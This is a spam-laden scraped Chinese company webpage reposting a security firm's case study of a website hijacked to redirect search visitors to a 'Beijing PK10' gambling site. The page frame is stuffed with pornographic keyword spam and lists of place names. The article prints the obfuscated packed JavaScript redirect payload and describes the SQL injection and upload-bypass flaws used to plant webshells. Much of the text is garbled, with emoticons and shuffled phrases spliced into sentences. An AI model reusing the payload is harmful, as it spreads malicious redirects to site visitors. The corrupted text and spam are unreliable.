亚洲女同成aV人片在线观看|亚洲www啪成人一区二区麻豆|亚洲国产中日韩精品综合|亚洲国产成人精品一级片|亚洲无码在线视频免费

<fieldset id="egc6u"></fieldset>
  • <strike id="egc6u"><form id="egc6u"><kbd id="egc6u"></kbd></form></strike>
    <sup id="egc6u"><table id="egc6u"></table></sup>
    <samp id="egc6u"><tfoot id="egc6u"><pre id="egc6u"></pre></tfoot></samp>
    • <strike id="egc6u"></strike>
      <tt id="egc6u"></tt>
      <tt id="egc6u"><dd id="egc6u"><thead id="egc6u"></thead></dd></tt>
      <tt id="egc6u"><dd id="egc6u"><dl id="egc6u"></dl></dd></tt>
      <samp id="egc6u"><big id="egc6u"></big></samp>
      <button id="egc6u"><big id="egc6u"><label id="egc6u"></label></big></button>
      天津九安特機電工程有限公司
      天津九安特機電工程有限公司
      導航菜單
      • 網(wǎng)站首頁(yè)
      • 網(wǎng)站建設
      • 整站優(yōu)化
      • 微信開(kāi)發(fā)
      • SEO內容優(yōu)化
      • 百度優(yōu)化
      • 百度SEO工具

      新聞中心

      網(wǎng)站標題被篡改成北京賽車(chē)、PK10的解決處理辦法

      客戶(hù)網(wǎng)站于近日被跳轉到賭博網(wǎng)站,網(wǎng)站打開(kāi)后直接跳轉到什么北京賽車(chē),標題被(′?_?`)篡北京Pヽ(′ー`)ノK10等內容的改成網(wǎng)站上去,客戶(hù)網(wǎng)站本身做了百度的賽車(chē)推廣,導致所有訪(fǎng)問(wèn)用戶(hù)都跳轉到賭博網(wǎng)站上去,??決處給客戶(hù)帶來(lái)很大的理辦經(jīng)濟損失,再一個(gè)官方??網(wǎng)站的網(wǎng)站形(′?`)象也受到了影響。我們SINE安全對客戶(hù)網(wǎng)站進(jìn)行檢查發(fā)現,標題被篡北京客戶(hù)網(wǎng)站的改成標題TDK被反復篡改成(北京賽車(chē)PK10等內容)立刻對該客戶(hù)網(wǎng)站的安全,進(jìn)行全面的賽車(chē)??源代碼安全審計以(yi)及網(wǎng)站漏洞檢測與網(wǎng)站漏洞修復,檢查了?客戶(hù)的決處首頁(yè)標題TDK內容確實(shí)是被篡改,并添加了一些加密的理辦惡意代碼,代碼如下:

      type='text/java'eval(function(p,a,c,k,e,d){ e=function(c??){ return(c35?String.fromCharCode??(c+29):c.toString(36))};if(!''.repla?ce(/^/,String)){ while(c--)d[e(c)]=k[c]||e(c);k=[function(e){ return d[e]}];e=function(){ return'\\w+'};c=1;};wh??ile(c--)if(k[c])p=p??.repl(′_`)ace(new RegExp('\\b'+e(c)+'\\b','g'),k[??c]);return p;}('m["\\9???\\d\\1\\l\\i\\a\\n\\0"]["\\8\\4\\6\\0\\a"](\'\\h??\\3\\1\\4\\6\\2\\0 \\0ヽ(′?`)ノ\\k\\2\??\a\\e\\7\\0\\a\\q\\0\\5\\g\\b\\f\\b\\3\\1\\4\\6\\2\\0\\7 \\3\\4\\1\\e\\7\\o( ?▽?)\\0\\0\\2\\3\\p\\5\\5\\8\\8\\8\\c\\1\\2\\9\\b\\3\\r\\c\\1\\d\\i\\5\\9\\9\\f\\(′?`)6\\2\\c\\g\\3\\7\??\j\\h\\5\\3\\1\??\4\\6\\2\\0\\j\');',2┐(′д`)┌8,28,'x74|x63|x70|x73|x72┐(′ー`)┌|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{ }))

      上述網(wǎng)站代碼是ASCII編碼,只要轉換成Unicode編碼,網(wǎng)站就可以看到加密的標題被篡ヽ(′▽?zhuān)?ノ北京真實(shí)內容。我們工程師對代碼進(jìn)行解讀,改成發(fā)現該代碼寫(xiě)的是根據搜索引擎作為判斷條件進(jìn)行跳轉??的代ヽ(′▽?zhuān)?ノ碼,通俗來(lái)講就是說(shuō),該代碼只針對搜索引擎,網(wǎng)站管理員直接輸入網(wǎng)址并不(╯‵□′)╯會(huì )發(fā)現網(wǎng)站跳轉到??賭博內容網(wǎng)站上去,客戶(hù)的網(wǎng)站通過(guò)百度或搜狗搜索會(huì )(╯°□°)╯︵ ┻━┻直(zhi)接跳轉到這個(gè)北京賽車(chē)、pk10的網(wǎng)站上去。

      針對于上述的問(wèn)題,我們??立即刪除加密的跳轉代碼,先將客戶(hù)網(wǎng)站損失(╬?益?)降到最低,促使網(wǎng)站正常訪(fǎng)問(wèn)(因為客戶(hù)一直在做百???度推廣,一直(′?_?`)在燒錢(qián)),通ヽ(′▽?zhuān)?/過(guò)(?????)一系列的安全檢測,網(wǎng)站到底是因為那些漏洞被上傳木馬,并(′?`*)篡改網(wǎng)站首頁(yè)的呢?經(jīng)過(guò)我們Siヾ(′ω`)?ne安全工程師對網(wǎng)站代碼的詳細的安全檢測后,發(fā)現(xian)該網(wǎng)站系統存在SQL注??入漏洞,導致攻擊者可以獲取到管??理??員賬戶(hù)和密碼,而網(wǎng)站后臺的地址用的也是默認的admin目錄名,致使黑客獲取密碼后,直接登錄網(wǎng)站后臺,在對網(wǎng)站后(hou)臺安全檢測的時(shí)候,發(fā)現產(chǎn)品圖片上傳功能,存在繞過(guò)格式??上傳腳本木馬的漏??洞。

      該網(wǎng)站漏洞產(chǎn)生于網(wǎng)站后臺的產(chǎn)品上傳頁(yè)面代碼中的$this->gete(′?_?`)xt($filear["name"]); //取得擴展名$this->set_savename($file); //設置保存文件名,這個(gè)代碼對文件擴展名可以直接繞過(guò)并上傳php格式的腳本文件,從而讓攻擊者輕易取得網(wǎng)站的權限??蛻?hù)還反映說(shuō),網(wǎng)站經(jīng)常被反復的篡改,導致跳轉到賭博網(wǎng)站,找了網(wǎng)站建設的公司,他們也只是刪除掉代碼,沒(méi)過(guò)多久??就又被篡改跳轉了,導致客戶(hù)網(wǎng)站損失嚴重,發(fā)生篡改跳轉的根本原因就是網(wǎng)站有漏洞,如果沒(méi)有修復好網(wǎng)站漏(°ロ°) !洞,即使刪除掉惡意代碼也只是表面上的工作,不起作用的還是會(huì )(°ロ°) !被反復篡改,于事無(wú)補┐(′ー`)┌,亡羊補牢一樣。需要對網(wǎng)站進(jìn)行安全??檢測,以及網(wǎng)站漏洞檢測,并修復好網(wǎng)站漏洞,清除木馬后門(mén),網(wǎng)站安全部署好,才會(huì )使網(wǎng)站更加的(de)安全穩定運行。

      網(wǎng)站漏洞修復的處理過(guò)程如下:

      對客戶(hù)網(wǎng)站源代碼進(jìn)行安全加固以及防止sql注入的前端過(guò)濾代碼,網(wǎng)站的后臺目錄安全設置,更改(′ω`)admin文件名為@#%admin,對網(wǎng)站后臺圖片上傳功能代碼進(jìn)行漏洞修復,設置上傳文件白名單機制,以及文件上傳的目錄進(jìn)行了腳本安全權限設置,禁止進(jìn)行腳本,對上傳的文?件擴展也進(jìn)行了深入的安全過(guò)濾,網(wǎng)站的數據庫安全部署,對數據庫的連接信息進(jìn)行加密,刪除root管理權限,設置普通數據庫賬號,讀寫(xiě)分離,新建表,查詢(xún)表,寫(xiě)入表等數據庫正常操作權限,網(wǎng)站后臺的賬號密碼設置的(′?_?`)復雜一些,密碼為12位數字+( ?ヮ?)字母+大小寫(xiě)組合,從發(fā)現網(wǎng)??站漏洞到目前解決問(wèn)題中,共查找到腳本木馬3個(gè)(webshell),一句話(huà)小馬后門(mén)2個(gè),發(fā)現網(wǎng)站的(′_`)模板內容也被篡改了??,導致客戶(hù)生成首頁(yè)的時(shí)候隨之也被加了惡意加密的代碼。

      網(wǎng)站安全(quan)預防措施:

      1.盡量避免網(wǎng)站后臺的默認名稱(chēng)如admin manage houtai

      2.對網(wǎng)站上傳目錄的權限進(jìn)行控制。(設置無(wú)腳本執行(???)權限)

      3.網(wǎng)站后臺的用戶(hù)名和密??碼設置復雜點(diǎn),數字+字母+大小寫(xiě)+特殊符號組合。

      4.阿里云虛擬主機用戶(hù)的FTP賬號密碼要設置復雜點(diǎn),數字+字母+大小寫(xiě)+特殊符號組??合。

      5.如果是單獨服務(wù)器的客戶(hù),建議先把服務(wù)器的安全( ?▽?)部署好,對每個(gè)網(wǎng)站的文件夾進(jìn)行安全部署,數據庫安( ?▽?)全部署,???,再做網(wǎng)站的安全,否則你網(wǎng)站再安全,服務(wù)器不安全也是于事無(wú)補。如果對安全不是太懂的話(huà),建議找專(zhuān)業(yè)的網(wǎng)站安全公司去處理解決。

      上一篇:黃浦區城市更新項目_黃浦區網(wǎng)站建設預算_1 下一篇:鴻蒙系統軟件開(kāi)發(fā)_鴻蒙系統app可以用java開(kāi)發(fā)嗎_1

      相關(guān)新聞

      • 龍崗網(wǎng)站建設公司_羅湖網(wǎng)站建設有哪些_1
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣服務(wù)哪家好_肇慶推廣網(wǎng)絡(luò )營(yíng)銷(xiāo)哪家好_1
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣服務(wù)哪家好_浙江網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣哪家好_1
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣機構_的網(wǎng)絡(luò )推廣公司好
      • 鴻蒙app開(kāi)發(fā)工具_鴻蒙app使用什么語(yǔ)言開(kāi)發(fā)

      欄目導航

      • 網(wǎng)站建設+
      • SEO診斷+
      • 百度SEO工具+
      • 代運營(yíng)+
      • 網(wǎng)站優(yōu)化+

      新聞資訊

      • 龍崗網(wǎng)站制作_龍崗建網(wǎng)站技巧
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣方案策劃與實(shí)施_甘肅網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣策略_2
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣機構_試驗機網(wǎng)絡(luò )推廣性?xún)r(jià)比
      • 網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣方案整合_網(wǎng)絡(luò )營(yíng)銷(xiāo)推廣工資_2
      • 黑白動(dòng)漫軟件_黑白動(dòng)畫(huà)制作網(wǎng)站推薦

      聯(lián)系我們

      電話(huà):18094313272

      網(wǎng) 址:http://www.hunqingrc.com/

      郵 箱:[email protected]

      地 址:上海市嘉定66號

      分享
      手機
      分類(lèi)
      頂部

      Copyright ? 2012-2018 天津九安特機電工程有限公司 版權所有 備案號:

      地址:北京市密云區66號  電話(huà):18960395558  郵箱:[email protected] 

      亚洲女同成aV人片在线观看|亚洲www啪成人一区二区麻豆|亚洲国产中日韩精品综合|亚洲国产成人精品一级片|亚洲无码在线视频免费 封丘县| 英德市| 隆德县| 铜川市| 定安县| 云霄县| 武穴市| 秦皇岛市| 双流县| 南宫市| 英山县| 库尔勒市| 闽清县| 平塘县| 乾安县| 宜城市| 申扎县| 乐亭县| 富锦市| 罗田县| 宜君县| 宣武区| 海宁市| 邵武市| 乐平市| 吉安市| 九江县| 磐安县| 灌云县| 伊春市| 乌兰察布市| 成武县| 周宁县| 伊金霍洛旗| 翼城县| 桓仁| 祥云县| 正阳县| 苏尼特右旗| 阳原县| 江津市| http://444 http://444 http://444 http://444 http://444 http://444
      <fieldset id="qqhcj"><var id="qqhcj"><em id="qqhcj"></em></var></fieldset>
          <strike id="qqhcj"></strike>
          <strike id="qqhcj"><var id="qqhcj"></var></strike>
        • <td id="qqhcj"></td>
          <tt id="qqhcj"></tt>
        • <samp id="qqhcj"></samp>
          <fieldset id="qqhcj"><table id="qqhcj"></table></fieldset>